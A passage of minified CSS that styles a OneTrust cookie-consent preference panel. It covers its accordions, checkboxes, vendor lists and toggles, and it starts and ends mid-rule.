label,#onetrust-pc-sdk #ot-selall-adtlvencntr label,#onetrust-pc-sdk #ot-selall-hostcntr label,#onetrust-pc-sdk #ot-selall-licntr label,#onetrust-pc-sdk #ot-selall-gnvencntr label{float:left;padding-left:0}#onetrust-pc-sdk #ot-ven-lst:first-child{border-top:1px solid #e2e2e2}#onetrust-pc-sdk ul{list-style:none;padding:0}#onetrust-pc-sdk ul li{position:relative;margin:0;padding:15px 15px 15px 10px;border-bottom:1px solid #e2e2e2}#onetrust-pc-sdk ul li h3,#onetrust-pc-sdk ul li h4{font-size:.75em;color:#656565;margin:0;display:inline-block;width:70%;height:auto;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk ul li p{margin:0;font-size:.7em}#onetrust-pc-sdk ul li input[type=checkbox]{position:absolute;cursor:pointer;width:100%;height:100%;opacity:0;margin:0;top:0;left:0}#onetrust-pc-sdk .ot-cat-item>button:focus,#onetrust-pc-sdk .ot-acc-cntr>button:focus,#onetrust-pc-sdk li>button:focus{outline:#000 solid 2px}#onetrust-pc-sdk .ot-cat-item>button,#onetrust-pc-sdk .ot-acc-cntr>button,#onetrust-pc-sdk li>button{position:absolute;cursor:pointer;width:100%;height:100%;margin:0;top:0;left:0;z-index:1;max-width:none;border:none}#onetrust-pc-sdk .ot-cat-item>button[aria-expanded=false]~.ot-acc-txt,#onetrust-pc-sdk .ot-acc-cntr>button[aria-expanded=false]~.ot-acc-txt,#onetrust-pc-sdk li>button[aria-expanded=false]~.ot-acc-txt{margin-top:0;max-height:0;opacity:0;overflow:hidden;width:100%;transition:.25s ease-out;display:none}#onetrust-pc-sdk .ot-cat-item>button[aria-expanded=true]~.ot-acc-txt,#onetrust-pc-sdk .ot-acc-cntr>button[aria-expanded=true]~.ot-acc-txt,#onetrust-pc-sdk li>button[aria-expanded=true]~.ot-acc-txt{transition:.1s ease-in;margin-top:10px;width:100%;overflow:auto;display:block}#onetrust-pc-sdk .ot-cat-item>button[aria-expanded=true]~.ot-acc-grpcntr,#onetrust-pc-sdk .ot-acc-cntr>button[aria-expanded=true]~.ot-acc-grpcntr,#onetrust-pc-sdk li>button[aria-expanded=true]~.ot-acc-grpcntr{width:auto;margin-top:0px;padding-bottom:10px}#onetrust-pc-sdk .ot-host-item>button:focus,#onetrust-pc-sdk .ot-ven-item>button:focus{outline:0;border:2px solid #000}#onetrust-pc-sdk .ot-hide-acc>button{pointer-events:none}#onetrust-pc-sdk .ot-hide-acc .ot-plus-minus>*,#onetrust-pc-sdk .ot-hide-acc .ot-arw-cntr>*{visibility:hidden}#onetrust-pc-sdk .ot-hide-acc .ot-acc-hdr{min-height:30px}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt){padding-right:10px;width:calc(100% - 37px);margin-top:10px;max-height:calc(100% - 90px)}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) #ot-sel-blk{background-color:#f9f9fc;border:1px solid #e2e2e2;width:calc(100% - 2px);padding-bottom:5px;padding-top:5px}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) #ot-sel-blk.ot-vnd-list-cnt{border:unset;background-color:unset}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) #ot-sel-blk.ot-vnd-list-cnt .ot-sel-all-hdr{display:none}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) #ot-sel-blk.ot-vnd-list-cnt .ot-sel-all{padding-right:.5rem}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) #ot-sel-blk.ot-vnd-list-cnt .ot-sel-all .ot-chkbox{right:0}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) .ot-sel-all{padding-right:34px}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) .ot-sel-all-chkbox{width:auto}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) ul li{border:1px solid #e2e2e2;margin-bottom:10px}#onetrust-pc-sdk.ot-addtl-vendors #ot-lst-cnt:not(.ot-host-cnt) .ot-acc-cntr>.ot-acc-hdr{padding:10px 0 10px 15px}#onetrust-pc-sdk.ot-addtl-vendors .ot-sel-all-chkbox{float:right}#onetrust-pc-sdk.ot-addtl-vendors .ot-plus-minus~.ot-sel-all-chkbox{right:34px}#onetrust-pc-sdk.ot-addtl-vendors #ot-ven-lst:first-child{border-top:none}#onetrust-pc-sdk .ot-acc-cntr{position:relative;border-left:1px solid #e2e2e2;border-right:1px solid #e2e2e2;border-bottom:1px solid #e2e2e2}#onetrust-pc-sdk .ot-acc-cntr input{z-index:1}#onetrust-pc-sdk .ot-acc-cntr>.ot-acc-hdr{background-color:#f9f9fc;padding:5px 0 5px 15px;width:auto}#onetrust-pc-sdk .ot-acc-cntr>.ot-acc-hdr .ot-plus-minus{vertical-align:middle;top:auto}#onetrust-pc-sdk .ot-acc-cntr>.ot-acc-hdr .ot-arw-cntr{right:10px}#onetrust-pc-sdk .ot-acc-cntr>.ot-acc-hdr input{z-index:2}#onetrust-pc-sdk .ot-acc-cntr.ot-add-tech .ot-acc-hdr{padding:10px 0 10px 15px}#onetrust-pc-sdk .ot-acc-cntr>input[type=checkbox]:checked~.ot-acc-hdr{border-bottom:1px solid #e2e2e2}#onetrust-pc-sdk .ot-acc-cntr>.ot-acc-txt{padding-left:10px;padding-right:10px}#onetrust-pc-sdk .ot-acc-cntr button[aria-expanded=true]~.ot-acc-txt{width:auto}#onetrust-pc-sdk .ot-acc-cntr .ot-addtl-venbox{display:none}#onetrust-pc-sdk .ot-vlst-cntr{margin-bottom:0;width:100%}#onetrust-pc-sdk .ot-vensec-title{font-size:.813em;vertical-align:middle;display:inline-block}#onetrust-pc-sdk .category-vendors-list-handler,#onetrust-pc-sdk .category-vendors-list-handler+a{margin-left:0;margin-top:10px}#onetrust-pc-sdk #ot-selall-vencntr.line-through label::after,#onetrust-pc-sdk #ot-selall-adtlvencntr.line-through label::after,#onetrust-pc-sdk #ot-selall-licntr.line-through label::after,#onetrust-pc-sdk #ot-selall-hostcntr.line-through label::after,#onetrust-pc-sdk #ot-selall-gnvencntr.line-through label::after{height:auto;border-left:0;transform:none;-o-transform:none;-ms-transform:none;-webkit-transform:none;left:5px;top:9px}#onetrust-pc-sdk #ot-category-title{float:left;padding-bottom:10px;font-size:1em;width:100%}#onetrust-pc-sdk .ot-cat-grp{margin-top:10px}#onetrust-pc-sdk .ot-cat-item{line-height:1.1;margin-top:10px;display:inline-block;width:100%}#onetrust-pc-sdk .ot-btn-container{text-align:right}#onetrust-pc-sdk .ot-btn-container button{display:inline-block;font-size:.75em;letter-spacing:.08em;margin-top:19px}#onetrust-pc-sdk #close-pc-btn-handler.ot-close-icon{position:absolute;top:10px;right:0;z-index:1;padding:0;background-color:rgba(0,0,0,0);border:none}#onetrust-pc-sdk #close-pc-btn-handler.ot-close-icon svg{display:block;height:10px;width:10px}#onetrust-pc-sdk #clear-filters-handler{margin-top:20px;margin-bottom:10px;float:right;max-width:200px;text-decoration:none;color:#3860be;font-size:.9em;font-weight:bold;background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,0);padding:1px}#onetrust-pc-sdk #clear-filters-handler:hover{color:#2285f7}#onetrust-pc-sdk #clear-filters-handler:focus{outline:#000 solid 1px}#onetrust-pc-sdk .ot-enbl-chr h4~.ot-tgl,#onetrust-pc-sdk .ot-enbl-chr h4~.ot-always-active{right:45px}#onetrust-pc-sdk .ot-enbl-chr h4~.ot-tgl+.ot-tgl{right:120px}#onetrust-pc-sdk .ot-enbl-chr .ot-pli-hdr.ot-leg-border-color span:first-child{width:90px}#onetrust-pc-sdk .ot-enbl-chr li.ot-subgrp>h5+.ot-tgl-cntr{padding-right:25px}#onetrust-pc-sdk .ot-plus-minus{width:20px;height:20px;font-size:1.5em;position:relative;display:inline-block;margin-right:5px;top:3px}#onetrust-pc-sdk .ot-plus-minus span{position:absolute;background:#27455c;border-radius:1px}#onetrust-pc-sdk .ot-plus-minus span:first-of-type{top:25%;bottom:25%;width:10%;left:45%}#onetrust-pc-sdk .ot-plus-minus span:last-of-type{left:25%;right:25%;height:10%;top:45%}#onetrust-pc-sdk button[aria-expanded=true]~.ot-acc-hdr .ot-arw,#onetrust-pc-sdk button[aria-expanded=true]~.ot-acc-hdr .ot-plus-minus span:first-of-type,#onetrust-pc-sdk button[aria-expanded=true]~.ot-acc-hdr .ot-plus-minus span:last-of-type{transform:rotate(90deg)}#onetrust-pc-sdk button[aria-expanded=true]~.ot-acc-hdr .ot-plus-minus span:last-of-type{left:50%;right:50%}#onetrust-pc-sdk #ot-selall-vencntr label,#onetrust-pc-sdk #ot-selall-adtlvencntr label,#onetrust-pc-sdk #ot-selall-hostcntr label,#onetrust-pc-sdk #ot-selall-licntr label{position:relative;display:inline-block;width:20px;height:20px}#onetrust-pc-sdk .ot-host-item .ot-plus-minus,#onetrust-pc-sdk .ot-ven-item .ot-plus-minus{float:left;margin-right:8px;top:10px}#onetrust-pc-sdk .ot-ven-item ul{list-style:none inside;font-size:100%;margin:0}#onetrust-pc-sdk .ot-ven-item ul li{margin:0 !important;padding:0;border:none !important}#onetrust-pc-sdk .ot-pli-hdr{color:#77808e;overflow:hidden;padding-top:7.5px;padding-bottom:7.5px;width:calc(100% - 2px);border-top-left-radius:3px;border-top-right-radius:3px}#onetrust-pc-sdk .ot-pli-hdr span:first-child{top:50%;transform:translateY(50%);max-width:90px}#onetrust-pc-sdk .ot-pli-hdr span:last-child{padding-right:10px;max-width:95px;text-align:center}#onetrust-pc-sdk .ot-li-title{float:right;font-size:.813em}#onetrust-pc-sdk .ot-pli-hdr.ot-leg-border-color{background-color:#f4f4f4;border:1px solid #d8d8d8}#onetrust-pc-sdk .ot-pli-hdr.ot-leg-border-color span:first-child{text-align:left;width:70px}#onetrust-pc-sdk li.ot-subgrp>h5,#onetrust-pc-sdk .ot-cat-header{width:calc(100% - 130px)}#onetrust-pc-sdk li.ot-subgrp>h5+.ot-tgl-cntr{padding-left:13px}#onetrust-pc-sdk .ot-acc-grpcntr .ot-acc-grpdesc{margin-bottom:5px}#onetrust-pc-sdk .ot-acc-grpcntr .ot-subgrp-cntr{border-top:1px solid #d8d8d8}#onetrust-pc-sdk .ot-acc-grpcntr .ot-vlst-cntr+.ot-subgrp-cntr{border-top:none}#onetrust-pc-sdk .ot-acc-hdr .ot-arw-cntr+.ot-tgl-cntr,#onetrust-pc-sdk .ot-acc-txt h4+.ot-tgl-cntr{padding-left:13px}#onetrust-pc-sdk .ot-pli-hdr~.ot-cat-item .ot-subgrp>h5,#onetrust-pc-sdk .ot-pli-hdr~.ot-cat-item .ot-cat-header{width:calc(100% - 145px)}#onetrust-pc-sdk .ot-pli-hdr~.ot-cat-item h5+.ot-tgl-cntr,#onetrust-pc-sdk .ot-pli-hdr~.ot-cat-item .ot-cat-header+.ot-tgl{padding-left:28px}#onetrust-pc-sdk .ot-sel-all-hdr,#onetrust-pc-sdk .ot-sel-all-chkbox{display:inline-block;width:100%;position:relative}#onetrust-pc-sdk .ot-sel-all-chkbox{z-index:1}#onetrust-pc-sdk .ot-sel-all{margin:0;position:relative;padding-right:23px;float:right}#onetrust-pc-sdk .ot-consent-hdr,#onetrust-pc-sdk .ot-li-hdr{float:right;font-size:.812em;line-height:normal;text-align:center;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk .ot-li-hdr{max-width:100px;padding-right:10px}#onetrust-pc-sdk .ot-consent-hdr{max-width:55px}#onetrust-pc-sdk #ot-selall-licntr{display:block;width:21px;height:auto;float:right;position:relative;right:80px}#onetrust-pc-sdk #ot-selall-licntr label{position:absolute}#onetrust-pc-sdk .ot-ven-ctgl{margin-left:66px}#onetrust-pc-sdk .ot-ven-litgl+.ot-arw-cntr{margin-left:81px}#onetrust-pc-sdk .ot-enbl-chr .ot-host-cnt .ot-tgl-cntr{width:auto}#onetrust-pc-sdk #ot-lst-cnt:not(.ot-host-cnt) .ot-tgl-cntr{width:auto;top:auto;height:20px}#onetrust-pc-sdk #ot-lst-cnt .ot-chkbox{position:relative;display:inline-block;width:20px;height:20px}#onetrust-pc-sdk #ot-lst-cnt .ot-chkbox label{position:absolute;padding:0;width:20px;height:20px}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info-cntr{border:1px solid #d8d8d8;padding:.75rem 2rem;padding-bottom:0;width:auto;margin-top:.5rem}#onetrust-pc-sdk .ot-acc-grpdesc+.ot-leg-btn-container{padding-left:20px;padding-right:20px;width:calc(100% - 40px);margin-bottom:5px}#onetrust-pc-sdk .ot-subgrp .ot-leg-btn-container{margin-bottom:5px}#onetrust-pc-sdk #ot-ven-lst .ot-leg-btn-container{margin-top:10px}#onetrust-pc-sdk .ot-leg-btn-container{display:inline-block;width:100%;margin-bottom:10px}#onetrust-pc-sdk .ot-leg-btn-container button{height:auto;padding:6.5px 8px;margin-bottom:0;letter-spacing:0;font-size:.75em;line-height:normal}#onetrust-pc-sdk .ot-leg-btn-container svg{display:none;height:14px;width:14px;padding-right:5px;vertical-align:sub}#onetrust-pc-sdk .ot-active-leg-btn{cursor:default;pointer-events:none}#onetrust-pc-sdk .ot-active-leg-btn svg{display:inline-block}#onetrust-pc-sdk .ot-remove-objection-handler{text-decoration:underline;padding:0;font-size:.75em;font-weight:600;line-height:1;padding-left:10px}#onetrust-pc-sdk .ot-obj-leg-btn-handler span{font-weight:bold;text-align:center;font-size:inherit;line-height:1.5}#onetrust-pc-sdk.ot-close-btn-link #close-pc-btn-handler{border:none;height:auto;line-height:1.5;text-decoration:underline;font-size:.69em;background:none;right:15px;top:15px;width:auto;font-weight:normal}#onetrust-pc-sdk .ot-pgph-link{font-size:.813em !important;margin-top:5px;position:relative}#onetrust-pc-sdk .ot-pgph-link.ot-pgph-link-subgroup{margin-bottom:1rem}#onetrust-pc-sdk .ot-pgph-contr{margin:0 2.5rem}#onetrust-pc-sdk .ot-pgph-title{font-size:1.18rem;margin-bottom:2rem}#onetrust-pc-sdk .ot-pgph-desc{font-size:1rem;font-weight:400;margin-bottom:2rem;line-height:1.5rem}#onetrust-pc-sdk .ot-pgph-desc:not(:last-child):after{content:"";width:96%;display:block;margin:0 auto;padding-bottom:2rem;border-bottom:1px solid #e9e9e9}#onetrust-pc-sdk .ot-cat-header{float:left;font-weight:600;font-size:.875em;line-height:1.5;max-width:90%;vertical-align:middle}#onetrust-pc-sdk .ot-vnd-item>button:focus{outline:#000 solid 2px}#onetrust-pc-sdk .ot-vnd-item>button{position:absolute;cursor:pointer;width:100%;height:100%;margin:0;top:0;left:0;z-index:1;max-width:none;border:none}#onetrust-pc-sdk .ot-vnd-item>button[aria-expanded=false]~.ot-acc-txt{margin-top:0;max-height:0;opacity:0;overflow:hidden;width:100%;transition:.25s ease-out;display:none}#onetrust-pc-sdk .ot-vnd-item>button[aria-expanded=true]~.ot-acc-txt{transition:.1s ease-in;margin-top:10px;width:100%;overflow:auto;display:block}#onetrust-pc-sdk .ot-vnd-item>button[aria-expanded=true]~.ot-acc-grpcntr{width:auto;margin-top:0px;padding-bottom:10px}#onetrust-pc-sdk .ot-accordion-layout.ot-cat-item{position:relative;border-radius:2px;margin:0;padding:0;border:1px solid #d8d8d8;border-top:none;width:calc(100% - 2px);float:left}#onetrust-pc-sdk .ot-accordion-layout.ot-cat-item:first-of-type{margin-top:10px;border-top:1px solid #d8d8d8}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-grpdesc{padding-left:20px;padding-right:20px;width:calc(100% - 40px);font-size:.812em;margin-bottom:10px;margin-top:15px}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-grpdesc>ul{padding-top:10px}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-grpdesc>ul li{padding-top:0;line-height:1.5;padding-bottom:10px}#onetrust-pc-sdk .ot-accordion-layout div+.ot-acc-grpdesc{margin-top:5px}#onetrust-pc-sdk .ot-accordion-layout .ot-vlst-cntr:first-child{margin-top:10px}#onetrust-pc-sdk .ot-accordion-layout .ot-vlst-cntr:last-child,#onetrust-pc-sdk .ot-accordion-layout .ot-hlst-cntr:last-child{margin-bottom:5px}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-hdr{padding-top:11.5px;padding-bottom:11.5px;padding-left:20px;padding-right:20px;width:calc(100% - 40px);display:inline-block}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-txt{width:100%;padding:0}#onetrust-pc-sdk .ot-accordion-layout .ot-subgrp-cntr{padding-left:20px;padding-right:15px;padding-bottom:0;width:calc(100% - 35px)}#onetrust-pc-sdk .ot-accordion-layout .ot-subgrp{padding-right:5px}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-grpcntr{z-index:1;position:relative}#onetrust-pc-sdk .ot-accordion-layout .ot-cat-header+.ot-arw-cntr{position:absolute;top:50%;transform:translateY(-50%);right:20px;margin-top:-2px}#onetrust-pc-sdk .ot-accordion-layout .ot-cat-header+.ot-arw-cntr .ot-arw{width:15px;height:20px;margin-left:5px;color:dimgray}#onetrust-pc-sdk .ot-accordion-layout .ot-cat-header{float:none;color:#2e3644;margin:0;display:inline-block;height:auto;word-wrap:break-word;min-height:inherit}#onetrust-pc-sdk .ot-accordion-layout .ot-vlst-cntr,#onetrust-pc-sdk .ot-accordion-layout .ot-hlst-cntr{padding-left:20px;width:calc(100% - 20px);display:inline-block;margin-top:0;padding-bottom:2px}#onetrust-pc-sdk .ot-accordion-layout .ot-acc-hdr{position:relative;min-height:25px}#onetrust-pc-sdk .ot-accordion-layout h4~.ot-tgl,#onetrust-pc-sdk .ot-accordion-layout h4~.ot-always-active{position:absolute;top:50%;transform:translateY(-50%);right:20px}#onetrust-pc-sdk .ot-accordion-layout h4~.ot-tgl+.ot-tgl{right:95px}#onetrust-pc-sdk .ot-accordion-layout .category-vendors-list-handler,#onetrust-pc-sdk .ot-accordion-layout .category-vendors-list-handler+a{margin-top:5px}#onetrust-pc-sdk #ot-lst-cnt{margin-top:1rem;max-height:calc(100% - 96px)}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info-cntr{border:1px solid #d8d8d8;padding:.75rem 2rem;padding-bottom:0;width:auto;margin-top:.5rem}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info{margin-bottom:1rem;padding-left:.75rem;padding-right:.75rem;display:flex;flex-direction:column}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info[data-vnd-info-key*=DPOEmail]{border-top:1px solid #d8d8d8;padding-top:1rem}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info[data-vnd-info-key*=DPOLink]{border-bottom:1px solid #d8d8d8;padding-bottom:1rem}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info .ot-vnd-lbl{font-weight:bold;font-size:.85em;margin-bottom:.5rem}#onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info .ot-vnd-cnt{margin-left:.5rem;font-weight:500;font-size:.85rem}#onetrust-pc-sdk .ot-vs-list,#onetrust-pc-sdk .ot-vnd-serv{width:auto;padding:1rem 1.25rem;padding-bottom:0}#onetrust-pc-sdk .ot-vs-list .ot-vnd-serv-hdr-cntr,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-serv-hdr-cntr{padding-bottom:.75rem;border-bottom:1px solid #d8d8d8}#onetrust-pc-sdk .ot-vs-list .ot-vnd-serv-hdr-cntr .ot-vnd-serv-hdr,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-serv-hdr-cntr .ot-vnd-serv-hdr{font-weight:600;font-size:.95em;line-height:2;margin-left:.5rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item{border:none;margin:0;padding:0}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item button,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item button{outline:none;border-bottom:1px solid #d8d8d8}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item button[aria-expanded=true],#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item button[aria-expanded=true]{border-bottom:none}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item:first-child,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item:first-child{margin-top:.25rem;border-top:unset}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item:last-child,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item:last-child{margin-bottom:.5rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item:last-child button,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item:last-child button{border-bottom:none}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info-cntr,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info-cntr{border:1px solid #d8d8d8;padding:.75rem 1.75rem;padding-bottom:0;width:auto;margin-top:.5rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info{margin-bottom:1rem;padding-left:.75rem;padding-right:.75rem;display:flex;flex-direction:column}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info[data-vnd-info-key*=DPOEmail],#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info[data-vnd-info-key*=DPOEmail]{border-top:1px solid #d8d8d8;padding-top:1rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info[data-vnd-info-key*=DPOLink],#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info[data-vnd-info-key*=DPOLink]{border-bottom:1px solid #d8d8d8;padding-bottom:1rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info .ot-vnd-lbl,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info .ot-vnd-lbl{font-weight:bold;font-size:.85em;margin-bottom:.5rem}#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info .ot-vnd-cnt,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info .ot-vnd-cnt{margin-left:.5rem;font-weight:500;font-size:.85rem}#onetrust-pc-sdk .ot-vs-list.ot-vnd-subgrp-cnt,#onetrust-pc-sdk .ot-vnd-serv.ot-vnd-subgrp-cnt{padding-left:40px}#onetrust-pc-sdk .ot-vs-list.ot-vnd-subgrp-cnt .ot-vnd-serv-hdr-cntr .ot-vnd-serv-hdr,#onetrust-pc-sdk .ot-vnd-serv.ot-vnd-subgrp-cnt .ot-vnd-serv-hdr-cntr .ot-vnd-serv-hdr{font-size:.8em}#onetrust-pc-sdk .ot-vs-list.ot-vnd-subgrp-cnt .ot-cat-header,#onetrust-pc-sdk .ot-vnd-serv.ot-vnd-subgrp-cnt .ot-cat-header{font-size:.8em}#onetrust-pc-sdk .ot-subgrp-cntr .ot-vnd-serv{margin-bottom:1rem;padding:1rem .95rem}#onetrust-pc-sdk .ot-subgrp-cntr .ot-vnd-serv .ot-vnd-serv-hdr-cntr{padding-bottom:.75rem;border-bottom:1px solid #d8d8d8}#onetrust-pc-sdk .ot-subgrp-cntr .ot-vnd-serv .ot-vnd-serv-hdr-cntr .ot-vnd-serv-hdr{font-weight:700;font-size:.8em;line-height:20px;margin-left:.82rem}#onetrust-pc-sdk .ot-subgrp-cntr .ot-cat-header{font-weight:700;font-size:.8em;line-height:20px}#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-vnd-serv .ot-vnd-lst-cont .ot-accordion-layout .ot-acc-hdr div.ot-chkbox{margin-left:.82rem}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr{padding:.7rem 0;margin:0;display:flex;width:100%;align-items:center;justify-content:space-between}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr div:first-child,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr div:first-child,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr div:first-child,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr div:first-child,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr div:first-child,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr div:first-child,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr div:first-child{margin-left:.5rem}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr div:last-child,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr div:last-child,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr div:last-child,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr div:last-child,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr div:last-child,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr div:last-child,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr div:last-child{margin-right:.5rem;margin-left:.5rem}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-always-active,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-always-active{position:relative;right:unset;top:unset;transform:unset}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-plus-minus,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-plus-minus{top:0}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-arw-cntr,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-arw-cntr{float:none;top:unset;right:unset;transform:unset;margin-top:-2px;position:relative}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-cat-header,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-cat-header{flex:1;margin:0 .5rem}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-tgl,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-tgl{position:relative;transform:none;right:0;top:0;float:none}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-chkbox,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-chkbox,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-chkbox,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr 